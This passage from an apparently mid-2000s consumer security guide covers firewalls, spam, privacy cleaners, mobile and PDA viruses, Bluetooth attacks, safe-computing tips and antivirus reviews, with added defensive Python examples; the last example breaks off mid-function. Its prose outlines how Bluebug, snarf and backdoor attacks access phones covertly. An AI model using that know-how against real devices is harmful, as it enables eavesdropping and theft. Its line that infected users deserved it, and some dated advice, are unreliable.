is attempted, say, a hacker trying to access your files, or undetected
spyware trying to send out information, the firewall blocks it. It
also makes your computer invisible to external networks, which is
great, as you can't attack what you can't see.
This book will only discuss personal firewalls, which are software
applications made for end users. A personal firewall will not usually
protect any more than the one PC it is installed on, unless other PCs
are sharing Internet connectivity via the protected PC. There are many
misconceptions about firewalls; most people misunderstand what a
firewall does for you. Here's a little explanation to clear things
up.

What  Can  A Firewall  Do? 

Generally, firewalls are configured to protect against unauthenticated
logins from the 'outside world'. This, more than anything, helps
prevent vandals from logging into machines on your network. More
elaborate firewalls block traffic coming into a PC but allow outgoing
traffic. Firewalls can also provide a single 'choke point': in a
situation where a computer system is being attacked by someone
dialling in with a modem, a firewall can act as an effective 'phone
tap' and tracing tool. Firewalls provide an important logging and
auditing function; they give summaries of the amount and types of
traffic that have passed through, how many attempts were made to
break in, and so on.

What  Can't  A Firewall  Do? 

Firewalls can't protect you against attacks that come through software
your firewall isn't protecting. For instance, when you install the
firewall and then run a P2P application, the firewall asks whether you
want it to monitor that software. More often than not, we disable
monitoring because we want as little interference as possible. Now, if
there are security holes in the P2P software, your computer is as
vulnerable to them as when you didn't have a firewall. It's very
important to consider what type of software you are disabling firewall
protection for.


A major misconception people have is that firewalls are effective
against viruses. An antivirus program can protect your machine from
viruses; the most a firewall can do is block worm and Trojan attacks
that originate over the network or via the Internet. However, a
firewall that's part of a security suite comes bundled with an
antivirus that can help you against malicious attacks.
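To make the two preceding sections concrete, here is an added example (it is not code from this book or from any firewall product it mentions) of the policy a personal firewall applies: outbound traffic and the replies to it are allowed, unsolicited inbound connections are blocked unless a port was deliberately exposed, an application the user has exempted from monitoring passes through unchecked (the P2P case above), and the log feeds the kind of audit summary the text describes. The program names, addresses and packet records are constructed for the example.

```python
"""Toy model of a personal firewall: default-deny inbound, allow outbound,
per-application exemptions, and an audit summary. Added example; the
packet records below are constructed, not captured from a real network."""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    direction: str   # "in" (from the network) or "out" (from this PC)
    app: str         # local program owning the socket (constructed names)
    remote: str      # address of the other end
    port: int        # service port on the side accepting the connection
    new_conn: bool   # True for a connection attempt, False for reply traffic


class PersonalFirewall:
    def __init__(self, exposed_ports=(), unmonitored_apps=()):
        self.exposed_ports = set(exposed_ports)        # services we chose to expose
        self.unmonitored_apps = set(unmonitored_apps)  # apps the user exempted
        self.established = set()                       # (app, remote, port) we opened
        self.log = []                                  # (verdict, reason, packet)

    def decide(self, pkt):
        """Return 'ALLOW' or 'BLOCK' for one packet and record the decision."""
        if pkt.app in self.unmonitored_apps:
            # The firewall cannot protect software it was told not to watch.
            verdict, reason = "ALLOW", "application exempted from monitoring"
        elif pkt.direction == "out":
            verdict, reason = "ALLOW", "outbound traffic"
            self.established.add((pkt.app, pkt.remote, pkt.port))
        elif not pkt.new_conn and (pkt.app, pkt.remote, pkt.port) in self.established:
            verdict, reason = "ALLOW", "reply to a connection this PC opened"
        elif pkt.port in self.exposed_ports:
            verdict, reason = "ALLOW", "deliberately exposed service"
        else:
            # Nobody asked for this connection: drop it silently, so the
            # machine looks invisible to the probing host.
            verdict, reason = "BLOCK", "unsolicited inbound connection"
        self.log.append((verdict, reason, pkt))
        return verdict

    def audit_summary(self):
        """The logging/auditing role: totals plus who was blocked how often."""
        verdicts = Counter(v for v, _, _ in self.log)
        blocked = Counter(p.remote for v, _, p in self.log if v == "BLOCK")
        return {"allowed": verdicts["ALLOW"], "blocked": verdicts["BLOCK"],
                "blocked_by_remote": dict(blocked)}


def run_demo():
    """Run constructed traffic through the policy; returns (verdicts, summary)."""
    fw = PersonalFirewall(unmonitored_apps={"p2pclient.exe"})
    traffic = [
        Packet("out", "browser.exe", "203.0.113.5", 80, True),      # web request
        Packet("in", "browser.exe", "203.0.113.5", 80, False),      # its reply
        Packet("in", "svchost.exe", "198.51.100.7", 445, True),     # SMB probe
        Packet("in", "svchost.exe", "198.51.100.7", 139, True),     # NetBIOS probe
        Packet("in", "p2pclient.exe", "198.51.100.9", 6881, True),  # exempted app
    ]
    return [fw.decide(p) for p in traffic], fw.audit_summary()


if __name__ == "__main__":
    for verdict, reason, pkt in PersonalFirewall().log:
        pass  # a real product would write these to its log viewer
    print(run_demo())
```

The fifth packet is the point of the "What Can't A Firewall Do?" section: an inbound connection to the exempted P2P client is allowed even though nothing asked for it, so any hole in that program is reachable exactly as if no firewall were installed.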

Spam 

Spam blockers have become an integral part of a secure computer. There
was a time when spam could be taken as harmless advertising, but now,
with the constant threat of malicious code entering your system
through spam, you need to take some serious precautions against it.
But first, let's start from the top.


Spamming is the buzzword for the use of any electronic communications
medium to send unsolicited messages in bulk. The most common form of
spam is delivered to e-mail inboxes as a form of commercial
advertising. What differentiates spam from solicited advertising, or
newsletters, is that you never signed up to receive it anywhere.


E-mail spamming involves sending identical or almost identical e-mail
messages to a large number of recipients. Spam usually contains
various tricks to bypass e-mail filters. Spammers obtain e-mail
addresses by a number of means: some buy databases from popular
Web-based sites that require you to sign up, some harvest addresses
from Usenet postings, DNS listings, bulk forwards or Web pages. Some
even go to the extent of guessing common names at known domains (also
known as a dictionary attack).

Problems  Caused  By  Spam 

Spam is considered such a major issue for a number of reasons.
Firstly, we waste a lot of time and bandwidth sorting through and
downloading these useless e-mails. Many popular e-mail providers will
still deliver fifty to a hundred spam messages every day to your
inbox, despite their inbuilt spam filtering technology. Not only is it
frustrating to filter legitimate mail from the junk, but spam can also
fill your allocated inbox space, preventing you from receiving
important mail.


It's not only the quantity of spam that's an issue; even the content
of the mails is questionable. A large percentage of spam contains ads
for pornographic Web sites or other such places that can be
unacceptable viewing for many, especially children.


Spam is usually sent from dedicated machines that may not have the
required security measures to ensure that the mail is not carrying
malicious code or a virus. Opening a spam mail could immediately
infect your PC with spyware or a worm without your knowledge. Another
big problem these days is spambots. Some spammers have created e-mail
viruses that turn your PC into a spambot, which informs the spammer of
its existence; the spammer then commands it to send a low volume of
spam. This allows spammers to send spam without being caught by their
ISPs or tracked down by anti-spammers, as the low volume makes it
hard to detect.

Precaution  Against  Spam 

There are many ways to deal with spam; some of them consume time,
others money. The oldest method used to get rid of junk mail is manual
deletion of everything that arrives in your mailbox from an unfamiliar
source. It's free, and effective for anyone who gets very little spam.
Unfortunately, not everyone is that lucky when it comes to spam.


A great way to get rid of spam is to set filters manually. Most
Web-based e-mail services have a button that allows you to categorise
all marked mails as spam, so the next time you get spammed from the
same source, the mail is automatically redirected to a junk mail
folder. E-mail clients also have provisions for e-mail filters. You
can set up some common spam words as a filter to redirect such mail to
the trash or a separate junk mail folder. This method is effective to
an extent, but not completely, as spammers use ever more innovative
techniques to get past the filters, like writing a commonly filtered
word such as 'Sex' as 'S E X', 'S*E*X' or even '5 E ><'.


The most effective way to avoid unsolicited mail is by using good
anti-spam software. Packages such as E-mailProtect (see chapter 5.2),
for example, are capable of dynamic, real-time filtering of inbound
e-mail based on approved word and e-mail address lists. It sends all
unsolicited and potentially dangerous e-mail to a quarantine folder,
where you can disable various aspects of the mail in order to preview
it safely. Anti-spam software has intelligent engines with an
excellent ability to sort the spam from useful mail, which is perfect
for someone whose mailbox is generally flooded with junk. You can
easily set up whitelists and blacklists to help the anti-spam utility
identify a useful mail that may otherwise come across as spam. The
only drawback is that most anti-spam software works only with e-mail
clients, so if you're using a Web-based mail facility, an anti-spam
application will not be much help.
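As an added example of the filtering just described (it is not code from this book or from E-mailProtect), the following Python filter applies a whitelist and blacklist of sender addresses first, then looks for blocked words only after undoing the obfuscations shown above ('S E X', 'S*E*X', '5 E ><'). The sender addresses, word lists and sample messages are constructed; the look-alike substitution table is an assumption about common spammer tricks, not a complete one.

```python
"""Keyword spam filter with whitelist/blacklist and de-obfuscation.
Added example; all lists and messages below are constructed."""
import re
from dataclasses import dataclass

# Constructed lists for the example; a real filter keeps these per user.
WHITELIST = {"alice@example.com"}          # approved senders: never filtered
BLACKLIST = {"deals@spam.example"}         # known spammers: straight to junk
SPAM_WORDS = {"sex", "viagra", "lottery"}  # blocked words, plain letters only

# Assumed look-alike substitutions: spammers swap letters for digits and
# symbols so a naive filter no longer sees the word.
LEET = {"5": "s", "$": "s", "3": "e", "1": "i", "0": "o", "4": "a", "7": "t"}
# Multi-character look-alikes are replaced before the single-character map.
MULTI = {"><": "x"}


def normalize(text):
    """Lowercase, letters-only tokens; runs of single-character tokens are
    fused so that 'S E X', 'S*E*X' and '5 E ><' all become 'sex'."""
    text = text.lower()
    for glyph, letter in MULTI.items():
        text = text.replace(glyph, letter)
    text = "".join(LEET.get(ch, ch) for ch in text)
    tokens, run = [], []
    for raw in text.split():
        tok = re.sub(r"[^a-z]", "", raw)   # 's*e*x' -> 'sex', drops '%' etc.
        if not tok:
            continue
        if len(tok) == 1:                   # maybe part of a spaced-out word
            run.append(tok)
            continue
        if run:
            tokens.append("".join(run))
            run = []
        tokens.append(tok)
    if run:
        tokens.append("".join(run))
    return tokens


@dataclass(frozen=True)
class Message:
    sender: str
    subject: str
    body: str


def classify(msg):
    """Return where the message goes: 'inbox', 'junk' or 'quarantine'."""
    sender = msg.sender.lower()
    if sender in WHITELIST:
        return "inbox"                      # approved senders bypass word checks
    if sender in BLACKLIST:
        return "junk"
    hits = set(normalize(msg.subject + " " + msg.body)) & SPAM_WORDS
    return "quarantine" if hits else "inbox"   # preview quarantined mail safely


# Constructed sample messages covering each path through the filter.
SAMPLE_MESSAGES = [
    Message("alice@example.com", "Lunch?", "Free S E X ed seminar flyer attached"),
    Message("deals@spam.example", "Hi", "Great offers inside"),
    Message("promo@mailer.example", "Hot S*E*X pills", "Order now"),
    Message("promo2@mailer.example", "5 E >< tonight", "Click here"),
    Message("bob@corp.example", "Quarterly numbers", "Revenue up 5% in Q3"),
]


def run_demo():
    """Classify the constructed sample set; returns the list of folders."""
    return [classify(m) for m in SAMPLE_MESSAGES]


if __name__ == "__main__":
    for m, folder in zip(SAMPLE_MESSAGES, run_demo()):
        print(f"{folder:10s} {m.sender:24s} {m.subject}")
```

Two design choices keep false positives down: the word match is against whole tokens rather than substrings (so place names like Essex do not trip the 'sex' rule), and the whitelist is checked before any word rule, which is exactly the "approved e-mail address list" role the text assigns to it. Fusing single-letter runs does merge genuine one-letter words with their neighbours, which is the price of catching spaced-out spellings.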

Privacy  Protection 

A lot of Internet users don't realise that what they do online can be
easily traced back to them. In fact, if you just monitor an Internet
user's activity for a period of time, you can tell what's happening in
his life. It's a scary thought that if someone takes enough
initiative, all your information can be as easily accessible as an
open book.

To access most services on the Internet, we need to give out some
accurate private information, such as our addresses, what we do, how
much we earn and even our credit card numbers. Though most Web sites
are quite careful with this information, chances are there are cookies
left behind on your machine that store everything you've entered. Your
browser history stores information about every page you surfed, and
some of the pictures you accessed on the Net can be found in your
temporary Internet files.

We don't intend to make you paranoid about technology or the Internet;
in fact, most home users are not really under much threat at all. But
a corporation with many rivals in the same business needs to be
careful about the kind of traces it leaves behind. If you think you
could be under a similar threat, you should definitely invest in
privacy protection software.


There are many solutions available for privacy protection: some
packages are available independently, while others come in a security
suite (more in Chapter 5.2). A privacy protection program basically
eliminates your Internet and computer usage traces by wiping clean all
history, cookies, temporary files and so on, depending on what level
of protection you set it to. You can clean up all cached files and
registry traces at the click of a button, or do it automatically every
time you log off your computer. The best part about deleting files
using a privacy protection program is that once a file is deleted,
it's practically unrecoverable even by a recovery or undelete tool.
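As an added example (not the book's or any product's code) of what a privacy-protection tool does when it "wipes" a trace file rather than merely deleting it: the file's contents are overwritten before the file is removed, so an ordinary undelete tool, which only re-links the old directory entry to the old disk blocks, recovers random bytes instead of your history. The trace folder and file names are constructed for the example.

```python
"""Overwrite-then-delete for trace files. Added example; the 'traces'
directory and its files are constructed in a temporary location."""
import os
import secrets
import tempfile


def secure_delete(path, passes=2):
    """Overwrite a file with random bytes, force it to disk, then unlink it.
    Returns True once the file no longer exists."""
    if not os.path.isfile(path):
        return False
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining > 0:
                chunk = min(remaining, 64 * 1024)
                f.write(secrets.token_bytes(chunk))
                remaining -= chunk
            f.flush()
            os.fsync(f.fileno())   # make sure the overwrite reached the disk
    os.remove(path)
    return not os.path.exists(path)


def wipe_directory(directory):
    """Securely delete every regular file directly inside `directory`.
    Returns how many files were wiped."""
    wiped = 0
    for name in os.listdir(directory):
        full = os.path.join(directory, name)
        if os.path.isfile(full) and secure_delete(full):
            wiped += 1
    return wiped


def run_demo():
    """Create a constructed set of browser-style traces, wipe them and
    report (files wiped, files left behind)."""
    work = tempfile.mkdtemp(prefix="traces_")
    samples = {
        "history.dat": b"visited: example.com\n" * 50,   # constructed history
        "cookies.txt": b"session=abc123; user=demo\n",  # constructed cookie
        "cache.tmp": bytes(4096),                         # constructed cache
    }
    for name, content in samples.items():
        with open(os.path.join(work, name), "wb") as f:
            f.write(content)
    wiped = wipe_directory(work)
    leftover = len(os.listdir(work))
    os.rmdir(work)
    return wiped, leftover


if __name__ == "__main__":
    print("wiped, leftover =", run_demo())
```

Treat the overwrite as risk reduction rather than a guarantee: journaling and copy-on-write filesystems, SSD wear levelling, and backups or shadow copies can all retain an older copy of the data that an in-place overwrite never touches. The "practically unrecoverable" claim above holds for the classic undelete tools on a magnetic disk that the text has in mind.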
4.3 Gadgets Under Threat




If your computer wasn't threatened enough, now you have to contend
with malicious code written for your gadgets as well. Virus makers are
moving on to new avenues, and it seems their slogan is "If it has an
OS, we'll infect it!" It is counter-productive and can cause harm to a
lot of people, but sadly, it is reality.


Mobile  Phones 

The Symbian Series 60 phones, such as the Nokia 6600 and 7610, have
become the favourite targets for new-age virus makers. After all,
there are innumerable software packages available for these phones
that can be downloaded to your computer and installed on the phone, or
even installed directly via GPRS. With the platform gaining so much
popularity, it was only a matter of time before it captured virus
makers' attention. Since the platform is new, people are gullible
enough to download whatever upgrades they can find for their phones,
and the virus scare hasn't really spread enough to make people think
twice; it's the perfect opportunity for virus makers to spread their
work and gain recognition.


One of the best known viruses for Series 60 phones is 'Cabir', a
somewhat malicious piece of code that drains batteries and propagates
itself via Bluetooth. The fact that a virus as avoidable as Cabir
managed to spread amongst the masses gives us a clue as to how
gullible everyday mobile users can be. To get infected by Cabir, your
phone needs to be in discoverable Bluetooth mode, visible to all
nearby devices. If an infected phone tries to infect your phone, you
get a prompt asking you to accept a message from an unknown device. If
you accept, another dialog box asks if you really want to install an
unverified program. Then, if you click accept, you get a third dialog
box that says "Install Caribe?", which should be sufficient warning to
anyone in today's day and age about malicious code. Despite three
ominous warnings, people were infected, leaving us to believe that
they deserved to be infected in the first place.


The success of Cabir got virus developers thinking, and today, more
advanced viruses such as Skulls and METAL Gear for Symbian series 60
phones are posing a threat via Bluetooth. The good thing about
Bluetooth is that at least you can reject an invitation sent by the
virus; MMS, on the other hand, is a different ball game. With
Bluetooth, viruses can only spread over short ranges, but with MMS,
a virus can send itself across the world, as is the case with
CommWarrior.a. Just like a worm on your PC, CommWarrior scans the
phone’s address book and periodically sends MMS messages to randomly
selected contacts. It sends a copy of itself and one of several
predefined text messages designed to encourage the recipient to
install the application. The good thing is that the application is
still only installed by your choice.

There are many other things besides viruses that are considered a
nuisance by smartphone users, all related to Bluetooth. A few of
these are listed below:

Bluejacking: Although known to the technical community and early
adopters for some time, the process now known as ‘Bluejacking’ has
recently come into focus in the consumer arena, and is becoming a
popular mechanism for exchanging anonymous messages in public
places. The technique involves abusing the Bluetooth ‘pairing’
protocol, the system by which Bluetooth devices authenticate each
other, to pass a message during the initial ‘handshake’ phase. This
is possible because the ‘name’ of the initiating Bluetooth device is
displayed on the target device as part of the handshake exchange. As
the protocol allows a large user-defined name field, up to 248
characters, the field itself can be used to pass the message.

SNARF Attacking: It is possible, on some mobile phones, to connect
via Bluetooth without alerting the owner of the phone. The person
connecting to the target phone gains access to the phonebook,
messages and other important data. This is normally only possible
if the device is in ‘discoverable’ or ‘visible’ mode, but there are
tools available on the Internet that allow even this safety net to
be bypassed.
Backdoor Attacking: The backdoor attack involves establishing a
trust relationship through the ‘pairing’ mechanism, but ensuring
that it no longer appears in the target’s register of paired
devices. In this way, unless you are actually observing your device
at the precise moment a connection is established, you are unlikely
to notice anything untoward, and the attacker is free to use any
resource allowed for trusted devices, such as file transfers. This
means that not only can data be retrieved from the phone, but other
services, such as modems or Internet, WAP and GPRS gateways, may be
accessed without the owner’s knowledge or consent.


Bluebug Attacking: The Bluebug attack creates a serial profile
connection to the device, thereby giving full access to the AT
command set, which can then be exploited using standard off the
shelf tools, such as PPP for networking and gnokii for messaging,
contact management, diverts and initiating calls. With this
facility, it is possible to use the phone to initiate calls to paid
numbers, send or read SMS messages, connect to data services such as
the Internet, and even monitor conversations in the vicinity of the
phone. Monitoring conversations is done via a voice call over the
GSM network, so the listening post can be anywhere in the world.
Bluetooth access is only required for a few seconds in order to set
up the call. Call forwarding diverts can be set up, allowing the
owner’s incoming calls to be intercepted, either to provide a
channel for calls to more expensive destinations, or for theft by
impersonation of the victim.


The way the trend is going, it seems that 2005 will see a big rise
in the number of mobile phone viruses. That’s why companies such as
SimWorks International Limited have already worked out an antivirus
for the Symbian series 60 phones.

SimWorks Anti-Virus protects phones from all known viruses
including Cabir a, Cabir b, Cabir c, the Mosquitoes dialer and the
Skulls trojan. The antivirus is basically a phone based application
that auto-starts when you switch on your phone. It scans incoming
messages and programs in real-time for viruses, stopping most
malicious software at the root itself. Just like a PC antivirus,
you also have an option to scan the phone manually or schedule
phone scans. You can even download updates from the SimWorks Web
site: http://www.simworks.biz/sav/AntiVirus.php

PDA viruses

The world’s first PDA virus was discovered running on a Windows
CE-based Pocket PC in 2004, but then again, who didn’t see that
coming? With PDAs getting closer to being full fledged PCs, and the
tremendous amount of independent software development for them, it
was only a matter of time before virus developers would pick up the
SDK and write away.


The first virus discovered on the Pocket PC was a classic Trojan
backdoor program called ‘Brador.a’. When Brador.a is launched, it
copies itself to Windows/StartUp/Svchost.exe so that it starts when
Windows starts. It then continually attempts to send the attacker
the IP address of the handheld by e-mail until it succeeds, after
which it waits for further instructions from the attacker. The virus
allows the attacker to remotely list the directory contents, upload
a file, display a message box, download a file and execute specified
commands. However, the good thing is that this trojan won’t really
start acting up until you execute it for the first time, so just be
careful about the kind of programs you run on your PDA.


Palm OS owners aren’t completely safe either. There have been three
major viruses detected for the Palm OS in recent times. First,
there’s the ‘Liberty Crack’ Trojan horse program that can wipe out
all the files from a PDA running the Palm OS. Then there’s also the
Palm ‘Vapor’ virus, another Trojan horse that renders all
third-party application icons invisible, appearing as if they had
been deleted. The third is the more heinous and more malicious ‘Palm
OS/Phage’ virus, which fills the device’s screen with a grey box,
crashes the application that is running, and then replicates itself.


As always, prevention is better than cure. As of now, viruses on
PDAs are not smart enough to spread without the help of user
ignorance, so it’s up to you to be vigilant about the things you
accept, and the applications you install on your PDA. Of course,
when all else fails there’s always the age old antivirus you can
depend upon.


Here are a few antivirus packages offered by known companies to
keep your PDA secure.

McAfee VirusScan PDA Enterprise 2.0

Platform: Windows Pocket 2002, Windows Mobile 2003

Based on the McAfee scan engine, VirusScan PDA employs advanced
detection and cleaning techniques to prevent all kinds of viruses
and other malicious code. It features real-time virus detection and
on-demand/on-schedule detection. The automatic updating ensures
that the devices have the latest virus updates.
AirScanner Mobile Antivirus Pro

Platform: PocketPC 2003, Windows Mobile 2003

The AirScanner Mobile Antivirus Pro can quarantine or eradicate
embedded viruses and malware with its fast and optimised scanning
speeds. Just as any good virus scanner should, AirScanner features
automatic, online updates of virus signatures and the scanning
engine. In addition to a virus scanner, it also includes powerful
tools for debugging Trojan horses with its advanced process
discovery tool. With its ActiveGuard feature there’s real-time virus
scanning by default. People who value PDA resources at all times can
use the slow background scanning option.

Symantec Norton Antivirus for Handhelds

Platform: Palm OS, PocketPC

Norton Antivirus for Handhelds comes from one of the most trusted
names in PC antivirus solutions. It has all the required features
that can be expected from a PDA antivirus today. The auto-protect
feature provides unobtrusive real-time protection against malicious
code. Automatic scans can check for viruses after expansion card
insertion or desktop synchronisation. On-demand and on-schedule
scans allow you to examine applications and files for viruses at any
time you want. Virus protection updates are automatically
transferred from your desktop computer the next time you synchronise
your PDA. Of course, there’s also an auto-update feature that
automatically downloads the new virus definitions.
4.4 Safe Computing

There are many precautions you can take while computing. Here are a
few you should follow if you’re paranoid about your security:

Firewalls And Security

o Use a firewall if you have an always on Internet connection.
Corporations can invest in hardware-based firewall security for
their networks, while home users can opt for software-based
personal firewalls.

o Turn off file sharing on your PC when you don’t need it. If a port
scan is done on your computer, a hacker may find a back door to
your machine and have access to your files via file sharing.

o Don’t open attachments when you receive e-mail from unknown
sources and the subject line seems unfamiliar.

o Don’t let other people use your computer, unless you really trust
them. If you really have to share, then create a guest login for
the other users with limited rights.

o Routinely update Windows software. The updates will fix many bugs
and known security holes within the Windows operating system.

o If regularly used programs have an auto-update option, keep it on.
You never know when a lethal security bug may be discovered.

Privacy Protection

o Your account is only as secure as its password. Create passwords
with nonsensical combinations of upper and lower case letters,
numbers and symbols. Also, change your passwords often. If you must
write down or record your password, take steps to disguise the
information so no one else can make out what it is.

o Look at the privacy policy of the online services you use, and
also before you enter private information in online forms. If you
are not satisfied with the policy, or if there is no policy posted,
avoid giving any personal information to that site.
o Check your browser’s cookie settings. You may accept or reject all
cookies, or you may allow only those cookies generated by the Web
sites you visit often.

o Do not provide sensitive personal information such as phone
numbers, passwords, addresses, credit card numbers or date of birth
in chat rooms, instant messengers, forum postings, e-mails or in
your online biography.

o Ask yourself if you want an employer, family member, or a marketer
to be able to link you to your public postings made in forums,
guestbooks, or newsgroups. Most of these services never delete your
postings. Even the ones that have disappeared off the Web site are
usually accessible in the archives.

o Use a pseudonym and a non-descriptive e-mail address when you
participate in public forums. Consider obtaining an e-mail address
from one of the free Web-based e-mail services for this purpose.

o Be aware of the possible social dangers of being online.
Harassment, stalking, being ‘flamed’ (emotional verbal attacks), or
‘spamming’ (being sent unsolicited messages) are just a few
examples. Women can be vulnerable if their e-mail addresses are
recognisable as a woman’s name. Consider using gender-neutral
e-mail addresses and nicknames.

o If your children use the Internet, teach them appropriate online
privacy behaviour. Caution them against revealing information about
themselves and your family.

o Use only secure Web sites when you transmit sensitive personal
information over the Internet. When you provide your credit card
account number to a shopping site, for example, be sure that the
transmission is secure. Look for the unbroken padlock at the bottom
right of the screen. Also make sure the Web address has the letter
‘s’ after http in the address bar at the top of the page.

o Be aware that online activities leave electronic footprints for
others to see. Your own ISP can determine what search engine terms
you use, what Web sites you visit, and the dates, times, and
durations of your online sessions. Web site operators can often
track the activities you engage in by placing ‘cookies’ on your
computer.


Mobile Phones And PDAs

o Frequently back up all data such as your phonebook, calendar, and
others to your PC. If you aren’t provided with a good backup
program, it’s advisable to purchase one.

o Don’t forget to keep your Bluetooth off when not in use. Even when
you turn it on, keep your Bluetooth’s visibility mode as hidden
from other devices.

o Never accept any Bluetooth input from an unknown source. You
could get infected with a virus.
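The two Bluetooth rules above (radio off when idle, hidden when on) are exactly the conditions that Cabir and the Bluetooth attacks in 4.3 rely on being ignored. The following check is an added example, not code from this guide or from any vendor it reviews: it reads the "Key: value" lines that BlueZ's bluetoothctl prints for "show" (layout assumed; both sample outputs and the adapter address are constructed) and reports an adapter that breaks either rule.

```python
def parse_show_output(text):
    """Turn the 'Key: value' lines of 'bluetoothctl show' into a dict.
    The 'Controller <addr>' header line carries no setting and is skipped."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Controller"):
            continue
        key, sep, value = line.partition(":")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit_adapter(props, in_use=False):
    """Return findings for an adapter that breaks the page's two rules.
    in_use=True means the owner deliberately has Bluetooth on right now."""
    findings = []
    powered = props.get("Powered", "no") == "yes"
    discoverable = props.get("Discoverable", "no") == "yes"
    if powered and not in_use:
        findings.append("radio is powered on while not in use")
    if powered and discoverable:
        findings.append("adapter is discoverable, visible to every nearby device")
        # BlueZ prints the timeout as hex seconds; 0 means visibility never expires.
        timeout = props.get("DiscoverableTimeout", "")
        if timeout and int(timeout, 16) == 0:
            findings.append("discoverable timeout is 0, so visibility never expires")
    return findings


# Constructed sample outputs in the layout bluetoothctl uses (assumed).
# WEAK is an adapter left visible with no timeout; HARDENED is the same
# adapter after being set non-discoverable.
WEAK = """Controller AA:BB:CC:DD:EE:FF (public)
\tName: laptop
\tAlias: laptop
\tPowered: yes
\tDiscoverable: yes
\tDiscoverableTimeout: 0x00000000
\tPairable: yes
"""

HARDENED = """Controller AA:BB:CC:DD:EE:FF (public)
\tName: laptop
\tAlias: laptop
\tPowered: yes
\tDiscoverable: no
\tDiscoverableTimeout: 0x000000b4
\tPairable: yes
"""

if __name__ == "__main__":
    for label, sample in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_adapter(parse_show_output(sample), in_use=True))
```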
Myths And Slayers

The problem with epic battles is that there are always a few
stories to be told, and not all of them are entirely true.

This section will uncover some of these myths and also take a look
at 10 solutions that you can entrust your data security to.
Myths & Solutions

5.1 Myths About Computer Viruses

As we have said before, not all the suspicious activity that
happens on your computer can be blamed on viruses. There could be
many reasons why your PC has been acting up, such as applications
clashing, missing files, hardware incompatibility and much more.
There are a lot of myths and false notions that people seem to have
about viruses and their solutions. This section hopes to shed light
on some common misconceptions.

Only Microsoft operating systems get viruses

Most virus writers want their work to be famous and get worldwide
recognition. With the majority of the world using Microsoft
operating systems, there are no prizes for guessing why most
malicious code is written for them. There are viruses for Macintosh
and Linux computers as well, though not as many.

If the EXE attachment is from someone I know, surely it’s safe

Just because you know the person doesn’t mean that the person is
aware of the mails he’s forwarding. He could be forwarding an
infected attachment without realising it, or it could be a worm on
his computer spreading its code to everyone in his address book.

The worm can’t hurt me if I don’t open the attachment

We only wish it was that simple. Today, most worms can infect your
computer and then spread to all your contacts even if you just open
the mail that contains the worm. You need to pay attention to the
subject line of the message.

Installing an antivirus guarantees my protection

Absolutely not! Depending on the kind of antivirus package you
have, it may have its own strengths and weaknesses. With viruses
getting smarter by the day, there’s a strong chance that the latest
batch may be undetectable by the antivirus’ heuristics system.

I don’t use an e-mail client, so I’m safe from e-mail viruses

Though this may be true to a small extent, it’s not a foregone
conclusion. Yes, using an e-mail client does give a virus the
opportunity to use the security holes of the application, but
Web-based e-mail doesn’t really have any other advantages. You will
still receive viruses in your Web-based e-mail, and they will infect
your computer if you download the attachments.


Formatting a hard drive is the best way to get rid of a virus

Yes, but only if you are not saving any of the data on it. If you
plan to back up your data, chances are the virus will embed itself
in that backed up data, and as soon as you restore the backup, you
are infected again! The best ways to get rid of viruses have been
explained in chapter 2.5.


5.2 Ten Antivirus Solutions

It can be quite a daunting task to find the perfect antivirus. There
are so many options available, and all seem to offer similar
features. What you need to do is identify only the features that
you need. You also need to keep your system configuration in mind,
and remember that an antivirus application is always running in the
background; an antivirus application that is system heavy could
kill a low-end system.

To help you make your choice easily, we have put together a list of
ten of the best antivirus packages across the world. We will tell
you each solution’s advantages and disadvantages, and what features
they offer, and this will help you make a thoughtful buying
decision.

So many options...

There are so many customised security solutions available for just
about every kind of user today. While the paranoid few may like to
pile up on a number of applications, just to be sure that their
system is secure from every threat in existence, some are more than
satisfied with a barebones antivirus scanner. We have highlighted
some antivirus packages that may be ideal for your needs, and also
separated them into different categories.
The Complete Security Solution

When you’re using your PC for commercial purposes, the data on your
machine is usually extremely sensitive and possibly even
confidential. You don’t want anything happening to it through a
virus attack, and you definitely don’t want it falling into the
wrong hands. For security of this level you need a lot more than a
mere antivirus; you need a specialised suite of utilities that
secures your machine from most threats. That’s exactly where the
following software comes in.

ZoneAlarm Security Suite 5.5

It’s a given that ZoneAlarm is everyone’s first choice when it comes
to personal firewalls. Now imagine a well reputed brand like that
bringing you a complete security system: a package that claims to
be the only thing you will require to keep yourself free from
viruses and other malicious software attacks. With big names
already in the market with similar packages, how does this one hold
up? Pretty well, actually!
The antivirus module is licensed from Computer Associates. Just like
any decent antivirus, this one too is capable of scanning files in
real-time as well as on demand and on schedule. With a smart
heuristics system in place, the antivirus is effective against all
kinds of malicious code, including viruses and trojans, even before
there’s a signature available for them. It works out to be extremely
effective in conjunction with the firewall.

The firewall module was already perfected by Zone Labs, so it’s
pretty obvious that the firewall is the biggest selling point of
this package. The firewall features intrusion blocking technology
that systematically identifies hackers and blocks access attempts,
along with a stealth mode that automatically makes your computer
invisible to anyone on the Internet. The firewall is pretty easy to
set up and configure, which makes it convenient even for novice
users.

The antispam module is licensed from MailFrontier. It integrates
well with e-mail clients such as Outlook Express and filters out all
the incoming spam quite effectively. It even monitors the outgoing
mail for any suspicious activities, such as too many receivers for
a single mail or too many mails being sent in too short a time
interval. The IMSecure module protects your Internet messengers
from spim and any other suspicious activity.
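The outgoing-mail checks just described (too many receivers on one mail, too many mails in too short a time) are the same heuristics that would catch the CommWarrior behaviour from section 4.3, a phone pushing a copy of itself to contact after contact. The detector below is an added example, not ZoneAlarm’s or any other vendor’s code: the log format, the thresholds and the sample messages are all constructed for the demonstration, and a third check for one attachment fanning out to many recipients is added on top of the two the page names.

```python
from collections import deque
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Message:
    when: datetime
    sender: str
    recipients: tuple   # e-mail addresses or phone numbers
    attachment: str     # "" when the message carries none


# Thresholds are assumptions picked for the demonstration, not vendor values.
MAX_RECIPIENTS = 10          # receivers allowed on a single message
MAX_PER_WINDOW = 5           # messages one sender may send inside WINDOW
MAX_ATTACHMENT_SPREAD = 4    # distinct recipients one attachment may reach
WINDOW = timedelta(minutes=10)


def parse_log(lines):
    """Parse constructed log lines of the form
    '<ISO time> <sender> -> <rcpt1>,<rcpt2> [attachment]'."""
    messages = []
    for raw in lines:
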